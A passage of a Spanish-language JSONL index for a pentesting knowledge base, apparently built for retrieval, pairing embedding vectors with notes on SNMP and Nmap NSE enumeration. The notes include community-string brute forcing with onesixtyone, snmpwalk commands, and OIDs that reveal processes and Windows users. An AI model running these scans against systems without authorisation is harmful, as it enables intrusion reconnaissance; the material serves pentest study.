0.23148, 0.05923, 0.12465, 0.04515, -0.09374, -0.06059, -0.05918, -0.04344, 0.03872, -0.1454, 0.07519, -0.07513, -0.00096, 0.10409, -0.04375, 0.00877, 0.07198, -0.13907, 0.07223, -0.03011, -0.00378, -0.04092, 0.01799, 0.0708, -0.10352, 0.12882, 0.06842, -0.03591, 0.08159, 0.06711, -0.01238, -0.04398, 0.00244, 0.00616, -0.0291, -0.09129, -0.04988, -0.08211, -0.05718, -0.01878, -0.05972, -0.00906, -0.02917, -0.04046, -0.00249, -0.00498, 0.04445, 0.07136, 0.02372, 0.04346, 0.05053, -0.03995, 0.00096, 0.03102, 0.00261, -0.0741, -0.08698, -0.01488, -0.03676, -0.11252, -0.06261, 0.03725, 0.05414, -0.06381, 0.02911, -0.07628, 0.05241, 0.00115, -0.06915, -0.05545, -0.01393, -0.03075, -0.00776, 0.04619, -0.06068, -0.05681, 0.05848, 0.05216, 0.07496, -0.03691, 0.03805, 0.10159, -0.03293, 0.02669, 0.05527, -0.07351, 0.01068, 0.03758, -0.05962, -0.01614, 0.05857, -0.03395, -0.03456, -0.00583, 0.03327, 0.04855, 0.01189, -0.05892, -0.03757, -0.00566, 0.01023, 0.02533, -0.06556, 0.04572, -0.02742, -0.0089, -0.01301, 0.02134, -0.00088, -0.01742, 0.02858, -0.01159, 0.08106, -0.00454, 0.02908, 0.01536, 0.05664, -0.09021, 0.05203, -0.01305, -0.02381, -0.01618, -0.00264, 0.05729, -0.03172, 0.02297, 0.01125, 0.00784, -0.0138, -0.0099, 0.03185, 0.05541, 0.03245, -0.0158, 0.06457, -0.04679, -0.05726, 0.03079, 0.03275, 0.02702, 0.02517, 0.05573, 0.04633, 0.04219, 0.03216, -0.04624, -0.00513, -0.0562, -0.00169, -0.00274, 0.02168, -0.03561, 0.0564, 0.0419, -0.01798, -0.01719, 0.0699, 0.02965, -0.0042, -0.04981, -0.01, 0.02438, -0.01264, -0.00686, -0.01094, -0.01387, -0.03123, 0.01112, -0.02314, -0.0185, 0.00276, 0.01457, 0.00254, 0.03986, 0.07523, -0.05955, 0.06865, -0.02339]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "quΓ© herramienta sirve para enumerar OIDs bonitos y ordenados", "v": [0.05536, 0.02885, -0.14605, 0.01249, 0.1453, -0.13069, -0.06463, -0.09191, -0.07689, -0.16897, -0.057, -0.07951, 0.10982, -0.17044, 0.09197, 0.03339, 0.14719, -0.19692, -0.03944, 0.04411, -0.07765, 0.06047, -0.05219, 0.04545, -0.06309, 0.01182, 0.12414, -0.02193, -0.25504, 0.16198, -0.0175, 0.03775, 0.03303, -0.0495, -0.18186, -0.02704, -0.10844, 0.04395, -0.09172, 0.08894, -0.08907, 0.13027, 0.02455, 0.12849, 0.08539, 0.01048, -0.03204, 0.20106, 0.06663, 0.04996, -0.01075, -0.17568, -0.13154, -0.07016, 0.05306, -0.12241, 0.09028, -0.08157, 0.02406, -0.03425, -0.0227, -0.01196, 0.03812, -0.01948, -0.03631, -0.05525, -0.0355, 0.02575, 0.10168, -0.04822, 0.00035, 0.01201, 0.04158, 0.01561, -0.04558, -0.02346, 0.03513, 0.04335, 0.05804, -0.00462, 0.02861, -0.06993, 0.02079, 0.02506, -0.02185, -0.05191, 0.02274, 0.07374, -0.07942, -0.05641, -0.06356, 0.09463, 0.00773, -0.01305, 0.02187, 0.00845, 0.04595, -0.00412, 0.1013, -0.00339, 0.0921, -0.10027, -0.11686, 0.02455, -0.07903, -0.01646, -0.07519, 0.02499, -0.05905, 0.00461, 0.11744, -0.0226, 0.04833, 0.07312, -0.00613, 0.04412, -0.06546, -0.04469, -0.00583, -0.06328, 0.04771, 0.06961, -0.05022, 0.00428, 0.01918, -0.01292, 0.01522, 0.05773, 0.03069, -0.08416, 0.01261, -0.04606, -0.05646, -0.0211, -0.05716, -0.04609, 0.08854, -0.12237, 0.04022, -0.01569, -0.0153, 0.02972, -0.0385, -0.0386, 5e-05, 0.00129, 0.07931, 0.00655, -0.01294, -0.03017, 0.01725, -0.0408, 0.0312, 0.01363, -0.02147, -0.0404, -0.02033, 0.00087, -0.10293, 0.01542, -0.0553, -0.05538, 0.07244, 0.02325, 0.04991, -0.03105, 0.05457, 0.03049, 0.06714, 0.03316, 0.08425, -0.02413, 0.02428, -0.05456, -0.01436, -0.06427, -0.08287, 0.06514, -0.04832, -0.04905, -0.02134, -0.05531, 0.00821, -0.00024, 0.00486, -0.05855, -0.00453, -0.02977, 0.01219, 0.03442, -0.00995, 0.01019, 0.01818, -0.09195, 0.03343, -0.01246, -0.00514, -0.05311, -0.00187, -0.01284, 0.00916, -0.04791, 0.00574, 0.01913, 0.0702, 0.07257, -0.01007, -0.00711, -0.00039, 0.01962, 0.01378, 0.0191, 0.01557, 0.02898, 0.01101, -0.03499, 0.00391, 0.00625, -0.06408, 0.00058, 0.01536, -0.04193, 0.02633, -0.00033, 0.01019, 0.08329, -0.03533, -0.02475, 0.00562, -0.01976, 0.00601, -0.05057, -0.002, -0.02372, 0.00401, -0.04538, 0.01324, 0.02403, -0.01482, -0.00649, 0.00857, 0.02663, -0.0007, -0.02076, -0.00032, -0.00946, 0.00893, -0.04504, -0.0028, -0.06862, -0.05718, -0.01085, 0.02454, -0.02497, 0.03159, 0.00304]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Herramientas\n```bash\nonesixtyone -c comm.txt IP/24 # descubre SNMP + fuerza community a la vez\nsnmpwalk -v2c -c public IP OID # recorre el Γ‘rbol de OIDs\nsnmp-check IP -c public # enumeraciΓ³n bonita y ordenada\nsnmpwalk -v2c -c public -Oa IP OID # -Oa = traduce hex a ASCII\n```", "indexar": "como traduzco el output hexadecimal de snmpwalk a texto ASCII", "v": [0.09926, -0.18163, -0.07087, -0.02165, -2e-05, -0.15172, -0.10606, -0.0912, 0.05885, 0.17571, -0.1077, -0.06533, -0.15741, -0.12554, 0.1103, -0.00214, -0.00498, -0.06087, -0.00923, 0.10155, 0.16227, -0.05274, -0.12976, 0.02114, 0.09646, -0.0669, -0.03936, 0.07081, -0.11192, -0.11142, 0.07602, -0.02493, 0.01232, 0.00563, -0.11137, 0.03253, -0.06401, 0.11197, 0.00058, 0.12238, 0.00618, 0.01782, -0.09236, -0.09841, -0.07928, -0.0326, -0.01628, -0.0068, -0.0247, -0.19341, 0.0572, 0.04176, -0.12675, -0.01134, -0.04209, 0.02199, 0.03331, 0.07442, -0.03926, -0.14914, 0.15122, 0.08663, 0.09691, -0.09133, -0.01914, -0.02204, 0.00428, -0.07989, -0.10958, 0.09312, -0.03826, 0.1308, 0.02224, -0.02159, 0.0328, 0.00252, -0.11517, -0.11364, 0.1233, -0.02728, -0.02444, 0.02033, 0.01355, -0.13881, 0.01973, 0.05429, 0.01679, -0.06457, 0.01659, 2e-05, 0.01027, -0.03456, -0.03462, 0.05447, 0.02522, -0.0714, -0.03604, 0.01455, -0.01166, 0.06256, 0.03215, -0.01232, -0.05627, 0.06936, 0.06092, 0.01622, 0.07065, 0.03856, -0.02397, 0.00252, 0.04382, 0.00977, -0.06197, 0.02705, -0.00466, -0.05966, 0.04585, 0.04645, 0.03053, -0.03419, -0.09449, 0.04963, 0.00963, 0.04683, 0.03385, 0.03093, -0.00238, 0.0295, 0.03062, -0.03386, -0.08252, -0.10197, -0.0034, 0.02695, -0.07355, 0.09879, 0.06148, -0.03373, 0.01222, 0.02645, 0.02013, 0.08069, -0.04476, 0.06431, -0.0157, 0.09743, 0.03263, -0.01997, 0.01114, -0.0226, -0.02527, -0.0245, -0.06766, 0.05116, -0.07922, -0.00057, -0.04946, 0.01839, -0.1361, -0.02239, -0.08614, -0.13051, 0.00582, -0.0041, 0.03044, 0.05898, 0.0124, -0.03399, 0.03861, -0.05153, -0.05125, 0.03109, 0.03182, -0.10933, -0.0271, -0.05146, -0.06606, -0.01918, -0.02312, 0.00059, -0.01254, 0.03941, 0.08571, -0.01349, 0.01083, 0.00679, -0.0129, -0.07162, -0.06346, -0.03263, -0.06654, 0.09067, -0.06645, -0.02354, 0.04684, -0.07575, 0.01092, 0.04837, 0.05144, -0.08716, -0.01936, -0.02304, 0.04184, -0.05569, 0.07646, 0.03805, -0.05256, 0.01694, -0.03233, 0.0352, 0.03147, 0.00073, 0.04798, -0.01197, -0.04273, 0.02787, 0.00834, -0.02859, -0.03927, 0.0235, -0.03063, -0.03695, 0.01788, -0.06633, 0.00027, -0.02335, 0.01348, 0.07298, -0.01379, 0.03777, -0.03012, 0.00384, -0.03531, -0.00361, -0.01141, 0.0484, -0.06132, 0.02016, -0.00474, -0.08912, 0.02356, 0.01266, -0.02232, -0.05826, -0.00875, 0.00337, -0.05077, 0.03875, 0.03821, -0.01049, 0.03696, 0.01787, 0.01248, -0.01102, -0.04041, 0.01749]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "ΒΏquΓ© herramienta me sirve para detectar nombres de interfaces de red?", "v": [-0.01266, 0.09221, -0.07408, -0.23603, 0.1191, -0.13341, -0.16572, -0.04152, 0.02609, -0.05901, -0.00671, -0.08272, -0.11245, -0.19817, 0.19984, 0.10719, 0.09995, -0.04047, 0.08939, -0.12636, 0.02772, 0.00442, -0.13935, -0.00521, -0.08573, -0.00754, 0.03902, -0.07506, -0.06955, 0.01018, -0.04758, -0.1249, 0.04104, -0.06417, -0.18984, -0.0202, 0.00994, -0.04657, 0.00671, 0.14891, 0.01631, 0.0468, -0.04725, 0.00354, 0.12366, 0.00729, -0.116, 0.00863, 0.00169, 0.06614, -0.0338, -0.15098, -0.14619, -0.02641, -0.06008, -0.16703, 0.12442, -0.00171, 0.02425, -0.06173, -0.08784, 0.00032, -0.0222, 0.03927, -0.00359, -0.15001, -0.0616, -0.06492, -0.05502, 0.03538, 0.04054, 0.03549, 0.03875, 0.01746, 0.04973, 0.05149, 0.07877, -0.01048, 0.13032, -0.00928, 0.03462, 0.01308, -0.07906, 0.00124, 0.01677, -0.03781, 0.07852, -0.0217, 0.0224, -0.08845, -0.00274, 0.08543, 0.02954, 0.02594, 0.06849, 0.00216, 0.04302, -0.02552, -0.03768, -0.06184, 0.09341, -0.0254, -0.07672, 0.04504, -0.01414, 0.00611, -0.06938, -0.0281, -0.04325, -0.02296, 0.0743, 0.01267, 0.03465, 0.01218, 0.00441, 0.05058, 0.10544, -0.03954, -0.03078, -0.01289, -0.03359, 0.01914, -0.03713, -0.04765, 0.02299, -0.06389, -0.03241, 0.0468, 0.01072, -0.03597, -0.03438, -0.05406, -0.01948, -0.05, -0.03975, -0.00362, 0.04756, -0.11428, 0.03068, -0.00166, -0.00473, 0.06839, -0.0616, -0.09983, 0.02838, 0.11769, 0.07444, -0.05413, -0.00201, 0.01482, 0.04149, -0.03184, -0.06575, 0.02221, -0.06731, 0.01117, 0.01362, 0.05157, -0.11042, -0.00231, -0.07848, -0.04922, -0.00374, -0.0055, -0.01004, -0.00969, 0.07732, 0.0175, 0.13274, 0.04135, 0.06514, 0.03509, 0.02201, -0.03984, -0.0332, -0.04261, -0.02754, -0.01533, -0.00254, -0.09762, -0.01728, -0.00479, -0.01105, -0.0395, 0.06378, -0.05395, 0.01758, -0.0496, -0.00376, -0.00951, -0.03541, 0.00438, -0.00164, -0.03695, 0.04462, 0.06146, 0.08984, -0.06949, 0.00891, -0.05129, 0.01541, -0.02853, -0.0188, 0.01969, 0.02023, 0.05042, -0.00547, 0.02107, 0.03309, 0.01689, 0.00598, 0.0373, 0.0389, 0.04267, -0.05458, -0.07504, -0.0523, 0.02084, 0.03722, -0.01322, 0.0078, -0.03635, 0.02551, 0.04129, -0.01643, 0.00518, -0.00729, -0.06956, 0.00796, -0.04583, 0.0772, -0.034, -0.01048, -0.0373, -0.03924, -0.11255, -0.00093, 0.02281, -0.05464, -0.01345, -0.03397, 0.05257, 0.01328, -0.00228, -0.02347, -0.04733, 0.0217, -0.043, -0.02406, -0.05505, -0.07393, 0.02776, 0.06254, -0.01515, 0.04369, -0.00074]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "cΓ³mo puedo ver quΓ© procesos estΓ‘n ejecutΓ‘ndose en un sistema?", "v": [-0.22737, 0.22768, -0.08757, -0.0105, 0.10589, 0.00674, 0.10004, -0.09299, -0.05941, -0.17346, -0.20962, 0.03815, -0.03043, -0.01485, 0.06516, 0.08876, 0.11602, 0.02534, -0.03629, -0.01974, -0.0861, -0.16661, -0.04843, -0.08517, 0.00856, 0.13162, 0.03359, -0.00326, -0.09223, -0.07794, -0.00294, 0.06705, 0.10285, -0.10385, -0.03274, 0.03056, -0.05521, 0.09383, -0.06372, 0.0372, -0.01238, 0.01236, -0.03667, -0.03117, 0.06617, -0.07984, 0.00719, -0.07286, -0.04734, -0.12095, -0.08033, 0.03407, -0.10981, -0.01581, 0.0273, -0.10185, 0.08012, -0.07396, 0.14288, -0.01368, -0.01826, 0.06283, 0.02855, 0.0355, 0.08916, 0.03897, -0.01547, -0.06129, 0.03358, 0.09804, -0.05444, -0.02093, -0.00909, 0.00744, 0.00983, 0.05049, -0.00237, 0.03697, 0.04079, 0.02643, 0.00619, 0.01992, -0.0702, 0.07356, -0.02192, -0.02211, -0.07717, -0.01556, 0.01776, -0.10615, 0.05252, -0.01836, 0.02746, 0.06409, 0.06218, -0.02783, 0.02917, -0.05441, -0.02801, 0.05945, -0.01673, -0.03954, -0.11961, 0.086, -0.04535, 0.00648, 0.05829, -0.02154, 0.02143, -0.12628, -0.04709, 0.00281, -0.05959, -0.00292, -0.06748, -0.02417, -0.02656, -0.05493, -0.05974, -0.01719, -0.05834, 0.00532, -0.02244, -0.10401, 0.11143, -0.1065, -0.00676, 0.07731, 0.01501, 0.026, -0.0233, -0.00842, -0.05417, -0.03545, 0.00976, -0.02194, 0.05927, 0.02622, 0.01007, -0.08549, 0.04363, 0.08262, 0.01845, -0.05574, 0.04549, -0.00193, 0.08626, -0.0851, -0.06575, -0.0727, -0.01167, 0.00126, 0.00455, 0.00862, -0.0488, -0.07865, 0.00177, -0.0862, 0.00074, -0.00855, -0.01289, 0.02048, -0.06145, 0.05199, 0.02889, -0.00613, -0.02765, -0.01448, 0.02723, 0.02818, 0.00654, 0.02369, -0.00582, -0.03522, 0.06364, -0.05729, -0.05498, -0.08867, 0.05371, 0.01127, -0.06948, 0.05571, 0.00563, -0.00735, -0.02443, -0.02728, -0.00645, 0.01404, 0.02012, 0.15321, 0.05093, 0.11459, -0.02005, -0.0267, -0.00879, -0.0088, -0.06047, -0.04757, -0.01489, -0.05725, -0.05866, 0.04213, 0.07598, -0.04597, 0.02568, 0.02938, -0.01223, 0.08507, -0.04851, 0.10756, 0.06114, 0.00124, 0.08607, -0.02856, -0.11733, -0.00057, -0.04345, -0.02687, 0.01804, -0.04742, 0.04672, 0.02434, 0.09169, 0.00578, -0.00193, -0.01567, 0.02082, 0.04969, -0.01657, 0.02888, -0.02764, -0.00503, -0.02793, -0.0139, 0.0282, 0.00205, 0.0107, -0.086, -0.05741, -0.04602, 0.09541, 0.13188, -0.03304, -0.0569, -0.00355, -0.05494, -0.08743, -0.00076, 0.02553, -0.10615, -0.04903, 0.04629, 0.04186, -0.03733, 0.00726, -0.06027]} +{"tipo": "pregunta", "herramienta": "SNMP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/SNMP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## OIDs ΓΊtiles (numΓ©ricos, no dependen de MIBs instalados)\n```\n1.3.6.1.2.1.25.4.2.1.2 Procesos en ejecuciΓ³n (hrSWRunName)\n1.3.6.1.2.1.25.6.3.1.2 Software instalado\n1.3.6.1.2.1.2.2.1.2 Nombres de interfaces de red (ifDescr)\n1.3.6.1.4.1.77.1.2.25 Usuarios Windows\n```\n- OID = direcciΓ³n jerΓ‘rquica: `iso(1).org(3).dod(6).internet(1)...`\n- Prefijo `1.3.6.1.2.1` (mib-2) es fijo; cambian los nΓΊmeros del final.\n\nRelacionado: Nmap Β· SMB Β· EnumeraciΓ³n Β· OSCP MOC", "indexar": "que programa permite listar usuarios Windows sin instalar bibliotecas externas", "v": [0.12116, 0.04833, -0.10472, -0.23017, 0.07212, -0.17845, -0.06728, -0.13857, -0.11505, -0.12557, 0.02263, -0.11396, -0.02215, -0.04629, 0.0095, -0.03078, 0.01504, -0.11067, 0.09892, -0.05863, 0.04133, 0.06316, -0.07267, 0.04369, -0.03789, 0.03044, -0.02726, -0.10149, -0.05681, 0.04147, -0.00762, -0.02269, 0.02897, -0.08164, -0.01057, -0.00657, 0.01352, 0.00351, 0.03801, 0.04008, 0.08421, 0.19027, 0.02883, 0.04412, -0.02829, -0.0861, 0.05302, -0.06804, 0.10639, -0.03371, -0.02447, -0.00388, 0.0003, -0.01418, 0.08011, -0.1537, 0.08405, -0.08054, -0.02929, 0.00474, -0.07029, 0.14106, 0.02993, 0.06167, 0.08084, 0.06324, 0.07806, 0.06021, -0.0629, 0.1403, -0.04632, 0.03114, 0.09692, -0.01678, -0.05366, 0.09675, -0.065, -0.10228, 0.11974, -0.04536, 0.03518, -0.00566, 0.0583, -0.03049, -0.06871, -0.08704, 0.00974, -0.02125, 0.02887, -0.04863, 0.04007, 0.00654, -0.03597, 0.08358, 0.13384, -0.13361, 0.11826, 0.02845, -0.00085, 0.09245, -0.03644, -0.01818, 0.00717, 0.12672, -0.0525, 0.00829, -0.00851, -0.12869, -0.02573, -0.05922, 0.03717, 0.01688, 0.01442, -0.06015, -0.02007, 0.04027, 0.03417, -0.07732, -0.00212, 0.02986, -0.1555, 0.00839, -0.04904, -0.03975, 0.07052, -0.00289, 0.04503, 0.0747, -0.08564, 0.0272, 0.05068, -0.02181, -0.02624, -0.02001, -0.17993, -0.01902, -0.03351, -0.08569, 0.01579, -0.04913, 0.05893, 0.05883, 0.01955, -0.00887, -0.00172, -0.04674, 0.04915, 0.04786, -0.04592, -0.027, 0.02569, 0.00268, -0.03761, 0.0379, -0.05847, 0.05724, 0.06039, -0.0055, -0.02651, 0.01445, 0.00796, 0.00605, 0.00989, -0.09549, -0.02029, -0.00255, -0.00391, 0.05066, 0.12342, 0.03541, -0.02221, 0.10572, -0.02941, -0.05107, -0.00462, 0.01034, 0.06607, -0.0251, 0.01196, 0.03531, -0.16369, 0.02379, 0.04029, -0.09257, -0.07568, -0.04981, -0.08578, -0.00128, -0.05938, -0.03627, -0.0563, 0.01272, 0.00019, -0.023, 0.06102, -0.02562, -0.04973, 0.01841, 0.01343, -0.05319, -0.04294, 0.04524, -0.01962, -0.02501, 0.10052, 0.03402, -0.03049, 0.04607, 0.04051, 0.0462, 0.02737, 0.02836, 0.0135, -0.02773, -0.02239, -0.09586, -0.02542, -0.00572, 0.06467, -0.05228, -0.01827, -0.032, 0.06687, 0.02237, 0.03425, -0.02139, -0.02609, 0.0022, 0.02704, 0.01825, -0.00767, -0.05749, 0.01718, -0.02154, 0.03977, -0.04184, -0.01522, 0.0066, -0.01338, -0.03125, -0.09116, 0.07945, -0.03334, -0.07154, -0.04348, -0.01778, -0.01979, 0.00194, 0.02196, -0.05434, -0.02617, 0.04819, 0.0545, -0.02514, 0.02106, 0.02019]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeraciΓ³n profunda y detecciΓ³n de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "indexar": "que programa sirve para hacer una enumeraciΓ³n profunda de vulnerabilidades sin instalar mΓ‘s cosas?", "v": [-0.01567, 0.12481, -0.26717, -0.12843, 0.1005, -0.07316, -0.02265, -0.08005, -0.09033, -0.12769, 0.00293, -0.02316, -0.0907, -0.10981, 0.01449, 0.00395, 0.05652, -0.18297, 0.10748, 0.08193, -0.03169, -0.03599, -0.04665, -0.06434, -0.09943, 0.04762, 0.0012, -0.05313, -0.07731, -0.06141, 0.0053, 0.00651, 0.10493, -0.08204, -0.03346, -0.00704, -0.0321, -0.04571, 0.02108, 0.11679, 0.08192, 0.09073, 0.01561, 0.07015, 0.05288, -0.04758, 0.03323, -0.07934, 0.07023, 0.00843, -0.10652, 0.08243, -0.0666, -0.08376, 0.05859, -0.10046, 0.02043, -0.14613, 0.03763, 0.01383, -0.12132, 0.08466, 0.07046, 0.01489, 0.08545, 0.03482, -0.00186, 0.00791, -0.06376, 0.10982, -0.04924, -0.05759, -0.01651, -0.05323, -0.03172, 0.00751, -0.01396, -0.03114, 0.01052, -0.02572, -0.02774, -0.01906, 0.08055, 0.03696, -0.13926, -0.04634, 0.12125, 0.04881, 0.02538, -0.07557, 0.07362, 0.09555, -0.0333, 0.0529, 0.09595, -0.06212, 0.17238, 0.02379, 0.00643, 0.05738, 0.03492, -0.14875, -0.02289, 0.1164, -0.03055, 0.06934, 0.03908, -0.04145, -0.00643, -0.05443, 0.02074, 0.06707, -0.0834, -0.09733, -0.07557, 0.00826, -0.05326, -0.006, 0.0206, 0.0279, -0.11811, -0.04074, -0.07078, 0.06269, 0.06024, -0.00235, -0.02671, 0.07179, -0.00602, 0.07648, 0.03038, -0.01825, 0.01665, 0.03826, -0.0918, -0.08357, 0.05171, -0.05809, -0.01279, -0.06546, 0.06001, 0.09445, -0.01849, 0.02627, -0.0203, 0.05683, 0.01934, -0.0484, -0.05114, 0.06166, 0.05763, 0.05189, -0.01392, 0.07847, -0.03876, -0.05643, 0.05268, -0.04147, -0.0055, 0.07663, 0.02231, 0.00481, -0.02207, -0.03061, 0.05823, -0.02454, -0.01215, 0.04978, 0.1369, 0.09008, -0.02833, 0.10365, 0.06023, -0.06979, -0.002, -0.02074, 0.03221, -0.04849, 0.05467, -0.02228, -0.07973, 0.00569, 0.07912, 0.02335, -0.00874, -0.01446, -0.03435, -0.00519, -0.00431, -0.02767, -0.03657, -0.04649, -0.09076, 0.00473, 0.04112, -0.03025, -0.01559, -0.01358, -0.01534, -0.0449, -0.08409, -0.01664, -0.03375, -0.01191, 0.10888, 0.09123, -0.04612, -0.03316, 0.02635, 0.13581, -0.00864, 0.01547, 0.03265, -0.01251, -0.03082, -0.06233, -0.00911, 0.08133, 0.01992, 0.0507, -0.01668, -0.06203, 0.01065, 0.03446, 0.01336, -0.04362, 0.00602, 0.00694, 0.02982, 0.05562, 0.00928, -0.04597, -0.0279, -0.07941, 0.03583, -0.02158, -0.0173, -0.00226, -0.0066, -0.05197, -0.00531, 0.05757, 0.03007, -0.06004, -0.02796, -0.02534, 0.00076, 0.02208, 0.00226, -0.04084, -0.05556, 0.05889, 0.04569, -0.06832, 0.03152, -0.00503]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeraciΓ³n profunda y detecciΓ³n de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "indexar": "con quΓ© puedo detectar fallos de seguridad sin usar herramientas adicionales?", "v": [0.0402, 0.10468, -0.21839, -0.12468, -0.01092, -0.02537, -0.08873, -0.056, -0.08602, -0.00468, -0.19912, -0.01211, -0.18181, -0.01439, 0.12191, -0.02231, 0.02066, -0.10417, -0.02889, -0.05095, 0.02144, -0.15777, -0.11817, -0.10051, -0.09275, 0.0276, -0.03044, -0.0544, -0.14146, -0.03471, 0.05901, 0.00037, 0.10767, -0.02574, -0.12396, -0.01248, -0.09081, 0.01095, 0.02379, 0.06509, 0.04802, 0.044, -0.08247, -0.04026, 0.07697, -0.07174, -0.06221, -0.01503, 0.03885, 0.03112, 0.00221, -0.10949, -0.08132, -0.08961, 0.00458, -0.1516, 0.15511, 0.00393, 0.10276, -0.10783, -0.16305, 0.03816, -0.01683, 0.08942, 0.0023, -0.12375, -0.00379, -0.04505, -0.08277, 0.00999, -0.02005, 0.00281, 0.05484, 0.10525, 0.02267, -0.00704, 0.02129, 0.02587, 0.16143, 0.02469, -0.0951, 0.04769, -0.03504, 0.00455, -0.08405, -0.06004, 0.01118, -0.01481, -0.04489, -0.09535, 0.05963, 0.10549, 0.05483, -0.07445, 0.03261, -0.00577, 0.12779, -0.01725, -0.0485, 0.02789, 0.11769, -0.13407, 0.05791, 0.12039, -0.01158, -0.00357, -0.05007, 0.02004, 0.03551, -0.11671, -0.07866, 0.05635, -0.00397, -0.04258, -0.07403, 0.05605, -0.01065, -0.10386, -0.00985, -0.00531, 0.03303, -0.03985, 0.01192, -0.0448, 0.05418, -0.07373, 0.01349, 0.0832, 0.00106, -0.05418, 0.04392, -0.07485, -0.08223, -0.06392, -0.03667, 0.0558, -0.03072, -0.08309, -0.08225, -0.01902, 0.01813, -0.00163, -0.01224, -0.03019, 0.0596, 0.04808, -0.05158, -0.03368, -0.08904, -0.01209, 0.04493, -0.01225, -0.01871, 0.03472, -0.02766, 0.01194, 0.00115, -0.00923, -0.03787, 0.01682, -0.03875, -0.01536, 0.03436, 0.06092, 0.03492, -0.02695, 0.04677, -0.01296, 0.02403, 0.03396, 0.01426, 0.02783, 0.01254, -0.06893, -0.03657, -0.05183, -0.04774, -0.05418, 0.02257, -0.05122, -0.02396, -0.0126, -0.05648, -0.02283, 0.04614, -0.05708, 0.03782, -0.00312, 0.04013, 0.03196, -0.0059, 0.05779, -0.01429, -0.01225, -0.0041, 0.01811, 0.03866, -0.08022, 0.02219, -0.00296, -0.0204, 0.0449, -0.01498, -0.06313, 0.0965, 0.04354, -0.07942, 0.02579, 0.02344, -0.00152, 0.05234, -0.06184, 0.10523, -0.09255, -0.07646, 0.0168, -0.00884, 0.05082, -0.06421, -0.01068, 0.06137, 0.03437, 0.01888, -0.00089, 0.00791, -0.00328, -0.02293, 0.0218, 0.04726, 0.04148, 0.02635, -0.00999, -0.08462, -0.03623, 0.01571, -0.05656, 0.01845, -0.03352, -0.04872, -0.02718, 0.01027, 0.08819, 0.01283, -0.0426, -0.02309, -0.02119, -0.05383, -0.00896, -0.02282, -0.07048, -0.01969, 0.04127, 0.04652, -0.08233, 0.00952, -0.00563]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# Nmap NSE (scripts)\n\n> El motor de scripts de Nmap: enumeraciΓ³n profunda y detecciΓ³n de vulns sin herramientas extra. Scripts en `/usr/share/nmap/scripts/`.", "indexar": "cual es la mejor alternativa a las pruebas de intrusiΓ³n con scripts incluidos?", "v": [0.03661, 0.12192, -0.23474, -0.04551, 0.07872, -0.13542, -0.09759, -0.07112, 0.01282, -0.04414, -0.07822, -0.04173, -0.03831, -0.03762, 0.01591, -0.01285, 0.00343, -0.12699, 0.05841, -0.02303, -0.05301, -0.02089, -0.0673, -0.04465, -0.13349, -0.0367, -0.10734, 0.0579, -0.01515, -0.07834, -0.01799, 0.02595, 0.04577, -0.03827, -0.12518, -0.05074, 0.00737, 0.11851, 0.10848, 0.21351, 0.00125, -0.04207, -0.07302, 0.05537, 0.05955, -0.12422, -0.02981, 0.1005, -0.00983, -0.08593, -0.05332, -0.01984, -0.02537, 0.01644, 0.03339, -0.0125, 0.04057, -0.13243, -0.02404, 0.02372, -0.07519, -0.01248, -0.01151, 0.03175, 0.08063, -0.01775, -0.02591, -0.05953, -0.03605, 0.02251, -0.00841, 0.01904, -0.04703, -0.08808, 